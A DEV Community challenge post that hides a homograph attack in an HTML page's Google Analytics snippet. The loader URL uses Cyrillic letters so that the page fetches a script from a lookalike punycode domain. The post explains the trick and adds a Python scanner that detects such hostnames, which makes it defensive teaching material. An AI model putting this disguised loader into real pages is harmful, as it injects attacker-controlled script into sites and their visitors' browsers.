DEV Community

Antony Garand

Spot the malware

Challenge

Help!

My website was recently infected, and I can't seem to get rid of the casino ads it is generating!
All I am serving is this plain HTML file, could you help me find out what is causing it?

The Google Analytics part was generated from the "Adding analytics.js to Your Site" page!

Index.html:

<title>Are you lost ?</title>
<h1>Lost on the internet?</h1>
<h2>Don't panic! I'm here to help</h2>
<strong><pre> * &lt;----- You are here</pre></strong>
<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-аnаlytics.com/analytics.js','ga');

ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->

Solution

This may seem like a regular website with Google Analytics attached, but there is a twist!
It may be more obvious when serving the page and inspecting the network tab:
[Screenshot: the Analytics request as shown in the network tab]

Instead of loading the expected google-analytics.com domain, the xn--google-nlytics-1tlb.com domain is loaded.

Why is that you may ask?

Well, the answer lies in both a's of google-analytics.com: they aren't your good old ASCII a, but are actually Cyrillic a!

Check it yourself: https://www.google-аnаlytics.com (Note: Domain not registered)

This leads us to a good old homograph attack, where most of us will see the legit google-analytics domain while its punycode equivalent, xn--google-nlytics-1tlb.com, will be loaded.

Punycode and homograph attacks are used a lot in phishing campaigns, but most browsers will show the xn-- (punycode) form of such a URL rather than the lookalike.

When reading source code, though, IDEs and text editors usually render the Cyrillic a exactly like the Latin one, which is hard to distinguish with the naked eye.
Malware authors can leverage this by registering hosts that look like popular CDNs or commonly injected script hosts, then replacing the genuine domain with their own.

This makes the change invisible when simply reading the source code, as with the index.html file above, yet lets them inject malware into the website.
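As an added example (not part of the original post), here is a small Python scanner that pulls hostnames out of an HTML or JS file, converts each one to its punycode form with Python's standard idna codec, and flags any host that contains non-ASCII characters or mixes scripts; the sample snippet, the URL regex and the script-detection heuristic are constructed for this example.

```python
import re
import unicodedata

# Constructed sample: the analytics loader from the challenge, with both "a"s of
# "google-analytics" replaced by CYRILLIC SMALL LETTER A (U+0430).
SAMPLE_HTML = (
    "<script>\n"
    "a.src='https://www.google-\N{CYRILLIC SMALL LETTER A}n"
    "\N{CYRILLIC SMALL LETTER A}lytics.com/analytics.js';\n"
    "</script>\n"
    "<script src=\"https://cdn.example.com/lib.js\"></script>\n"
)

# Captures the host part of every http(s) URL found in attributes or strings.
URL_RE = re.compile(r"https?://([^\s/'\"<>]+)")

def extract_hosts(source):
    """Return every hostname referenced by an http(s) URL in the source text."""
    return URL_RE.findall(source)

def script_of(ch):
    """Heuristic script name: first word of the Unicode name (LATIN, CYRILLIC...)."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def analyze_host(host):
    """Describe a hostname: its punycode form, non-ASCII characters, script mix."""
    non_ascii = [(i, ch, f"U+{ord(ch):04X}", unicodedata.name(ch, "?"))
                 for i, ch in enumerate(host) if ord(ch) > 127]
    # The idna codec applies nameprep and punycode label by label (xn-- prefix);
    # a hostname that is already pure ASCII comes back unchanged.
    try:
        punycode = host.encode("idna").decode("ascii")
    except UnicodeError:
        punycode = None  # label too long or otherwise not encodable
    scripts = {script_of(ch) for ch in host if ch.isalpha()}
    return {"host": host, "punycode": punycode,
            "non_ascii": non_ascii, "mixed_script": len(scripts) > 1}

def scan(source):
    """Report every host whose visible spelling hides a different DNS name."""
    return [r for r in map(analyze_host, extract_hosts(source))
            if r["non_ascii"] or r["mixed_script"]]

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML):
        print(f"{f['host']} -> {f['punycode']} (mixed script: {f['mixed_script']})")
        for i, ch, cp, name in f["non_ascii"]:
            print(f"  offset {i}: {cp} {name}")
```

Run it against a checked-out copy of the site and diff the output over time; a host that suddenly gains an xn-- label is the signal the screenshot above shows, without having to execute the page.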

Reference

  • Homographs-attack: check out this post's reference if you need more; I can't match its completeness.

Top comments (9)

Stephanie Handsteiner • Edited

Good description. :)

I mean here in the example it's easy to spot, because it's not much code to scan, but in a real-world project it might not be that easy to spot after scanning hundreds of lines of code.

There's really not much you can do except keeping a close eye on your site's network requests.

Antony Garand

Even there, you need to ensure the domain will be rendered as punycode in the network tab.

Checking it in the network tab also implies you are running the code, which is quite unsafe with malware: it may already be too late if the malware can execute itself.

Guillaume Martigny

A real attacker would need to change the code snippet on Google's site. Which is, let's be honest, impossible.

However, you indeed need to be really careful with the code you copy/paste from Internet.

Antony Garand

The scenario I am expecting here is for a website to be infected, such as a WordPress blog having a vulnerable plugin or outdated version.

Once the website is compromised, the attacker can change the analytics code and it would be really hard to detect.

Jason C. McDonald

Creepy.

But good to know!

Binh Bui

Since you discovered this, maybe you can give us some solutions on how to prevent this? (I have zero experience in security btw)

JeffD

Nice challenge idea, perfect explanation 👍

Jermaine

Thanks Antony.

My first time hearing about this. Would love to see more security posts.

Antony Garand

Check out my profile to find more, I've got a few security-related posts out already!